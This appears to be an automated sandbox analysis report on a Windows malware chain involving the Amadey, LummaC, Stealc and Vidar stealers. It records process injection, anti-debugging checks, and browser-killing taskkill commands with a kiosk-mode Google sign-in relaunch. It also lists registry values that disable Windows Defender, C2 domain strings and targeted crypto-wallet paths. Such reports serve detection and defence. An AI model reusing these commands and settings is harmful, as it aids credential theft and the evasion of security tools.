Code function: 0_2_04CE027F rdtsc

0_2_04CE027F

Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe

Code function: 8_2_0043A1E0 LdrInitializeThunk,

8_2_0043A1E0

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_0104EAA2 BlockInput,

9_2_0104EAA2

Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe

Code function: 6_2_00025027 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_00025027

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_00FD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

9_2_00FD42DE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F0652B mov eax, dword ptr fs:[00000030h]	0_2_00F0652B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00F0A302 mov eax, dword ptr fs:[00000030h]	0_2_00F0A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00F5A302 mov eax, dword ptr fs:[00000030h]	1_2_00F5A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 1_2_00F5652B mov eax, dword ptr fs:[00000030h]	1_2_00F5652B
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 6_2_0003A1A9 mov edi, dword ptr fs:[00000030h]	6_2_0003A1A9
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 6_2_00021770 mov edi, dword ptr fs:[00000030h]	6_2_00021770
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00021770 mov edi, dword ptr fs:[00000030h]	8_2_00021770
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FF4CE8 mov eax, dword ptr fs:[00000030h]	9_2_00FF4CE8

Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe

Code function: 6_2_00029726 GetProcessHeap,

6_2_00029726

Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 6_2_0002501B SetUnhandledExceptionFilter,	6_2_0002501B
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 6_2_00025027 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00025027
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 6_2_000278CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_000278CC
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 6_2_000245B7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_000245B7
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_0002501B SetUnhandledExceptionFilter,	8_2_0002501B
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_00025027 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00025027
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_000278CC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_000278CC
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Code function: 8_2_000245B7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_000245B7
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_01002622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_01002622
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FF083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00FF083F
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FF09D5 SetUnhandledExceptionFilter,	9_2_00FF09D5
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Code function: 9_2_00FF0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00FF0C21

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe

Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: acdee533dd.exe PID: 6828, type: MEMORYSTR

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe

Code function: 6_2_0003A1A9 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,

6_2_0003A1A9

Excessive usage of taskkill to terminate processes

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe

Memory written: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: PK13K1G.exe, 00000006.00000002.2398315552.000000000050E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: debonairnukk.xyz
Source: PK13K1G.exe, 00000006.00000002.2398315552.000000000050E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: diffuculttan.xyz
Source: PK13K1G.exe, 00000006.00000002.2398315552.000000000050E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: effecterectz.xyz
Source: PK13K1G.exe, 00000006.00000002.2398315552.000000000050E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: deafeninggeh.biz
Source: PK13K1G.exe, 00000006.00000002.2398315552.000000000050E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: immureprech.biz
Source: PK13K1G.exe, 00000006.00000002.2398315552.000000000050E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: bellflamre.click

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

9_2_01031201

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_01012BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

9_2_01012BA5

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_0103B226 SendInput,keybd_event,

9_2_0103B226

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_0103E355 mouse_event,

9_2_0103E355

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe "C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe "C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe "C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe	Process created: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe "C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_01030B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

9_2_01030B62

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_01031663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

9_2_01031663

Source: 8ed1a1ded0.exe, 00000009.00000000.2460183750.0000000001092000.00000002.00000001.01000000.0000000B.sdmp, 8ed1a1ded0.exe, 0000001C.00000000.2580231186.0000000001092000.00000002.00000001.01000000.0000000B.sdmp, 8ed1a1ded0.exe, 00000020.00000002.2836034761.0000000001092000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: acdee533dd.exe, 0000001A.00000002.3066752862.0000000000BCE000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: \|2SProgram Manager
Source: 8ed1a1ded0.exe	Binary or memory string: Shell_TrayWnd
Source: firefox.exe, 00000017.00000002.2609651982.000000297AFFB000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ?ProgmanListenerWi
Source: file.exe, 00000000.00000002.1746006754.0000000001104000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1767219062.0000000001154000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: oPruIProgram Manager
Source: file.exe, 00000000.00000002.1746006754.0000000001104000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1767219062.0000000001154000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: PruIProgram Manager
Source: e2def46cb9.exe, 0000001F.00000002.2814642403.0000000000DBB000.00000040.00000001.01000000.00000016.sdmp	Binary or memory string: UProgram Manager

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_00FF0698 cpuid

9_2_00FF0698

Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015169001\f0cbba1288.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015169001\f0cbba1288.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015170001\fe1ffe1825.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015170001\fe1ffe1825.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015171001\a7f0050fba.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015171001\a7f0050fba.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1015172001\69b1a0308c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: unknown VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1015167001\acdee533dd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00EECBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

0_2_00EECBEA

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_0102D27A GetUserNameW,

9_2_0102D27A

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_0100BB6F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

9_2_0100BB6F

Source: C:\Users\user\AppData\Local\Temp\1015166001\8ed1a1ded0.exe

Code function: 9_2_00FD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

9_2_00FD42DE

Source: C:\Users\user\AppData\Local\Temp\1015146001\PK13K1G.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1015168001\e2def46cb9.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.2.file.exe.ed0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.skotes.exe.f20000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.1723413141.0000000004B10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1745261623.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1704042533.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1764486811.0000000000F21000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2295922618.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match	File source: Process Memory Space: 8ed1a1ded0.exe PID: 7072, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ed1a1ded0.exe PID: 2476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8ed1a1ded0.exe PID: 6464, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 0000001A.00000002.3062381996.0000000000801000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.3074070661.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000003.2782806732.0000000004B60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2570885838.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.3139421502.0000000000801000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.3142680354.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: acdee533dd.exe PID: 6828, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: acdee533dd.exe PID: 6828, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: acdee533dd.exe, 0000001A.00000002.3062381996.00000000008CC000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: acdee533dd.exe, 0000001A.00000002.3062381996.0000000000967000.00000040.00000001.01000000.00000012.sdmp	String found in binary or memory: \ElectronCash\wallets\
